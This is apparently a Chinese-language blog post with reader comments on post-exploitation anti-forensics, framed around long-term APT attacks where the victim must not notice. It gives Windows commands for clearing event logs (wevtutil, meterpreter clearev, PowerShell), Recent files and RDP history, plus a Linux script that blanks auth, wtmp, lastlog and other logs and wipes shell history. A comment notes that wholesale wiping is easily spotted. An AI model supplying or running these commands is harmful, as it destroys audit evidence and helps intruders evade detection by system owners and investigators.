後滲透清除痕跡
後滲透清除痕跡
前言:
後滲透到一個段落時,如果長期要做 APT 攻擊的話,清除痕跡是必須要做的事情,最主要讓 victim 不被發覺為首要目的,最終拿下整個網域的權限 xD
內文 :
Windows
實作環境 :
windows 10
wevtutil :
wevtutil el 列出系統中所有日誌名稱
wevtutil cl system 清理系統日誌
wevtutil cl application 清理應用程序日誌
wevtutil cl security 清理安全日誌
meterperter :
meterpreter > clearev 清除windows中的應用程序日誌、系統日誌、安全日誌Powershell :
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}
清除 recent :
開啟 :
C:\Users\Administrator\Recent 刪除全部內容cmd :
del /f /s /q "%userprofile%\Recent*.*
RDP :
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
Linux
實作環境 :
Ubuntu
日誌文件位置 :
/var/run/utmp 記錄現在登入的用戶
/var/log/wtmp 記錄用戶所有的登入和登出
/var/log/lastlog 記錄每一個用戶最後登入時間
/var/log/btmp 記錄錯誤的登入嘗試
/var/log/auth.log 需要身份確認的操作
/var/log/secure 記錄安全相關的日誌信息
/var/log/maillog 記錄郵件相關的日誌信息
/var/log/message 記錄系統啟動後的信息和錯誤日誌
/var/log/cron 記錄定時任務相關的日誌信息
/var/log/spooler 記錄UUCP和news設備相關的日誌信息
/var/log/boot.log 記錄守護進程啟動和停止相關的日誌消息清除命令歷史紀錄 :
在隱蔽的位置執行命令 :
histroy -r 删除當前會話歷史紀錄
history -c 删除内存中的所有命令歷史
rm .bash_history 删除歷史文件中的内容
HISTZISE=0 通過設置歷史命令條數來清除所有歷史紀錄
使用vim打開文件執行命令 :
:set history=0
:!command一鍵清除腳本 :
將內容存為 clear.sh 腳本
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c
將內容存為 clear.sh 腳本。
./clear.sh
typo:
回覆刪除rm ~/./bash_history -> rm ~/.bash_history
BTW
直接清空 log 和 history file ,個人覺得動靜超大,基本上比啥都不做還容易被抓XD
感謝感謝 , 可能不要全刪比較好 , 可能要看當時的狀況去決定 xD
回覆刪除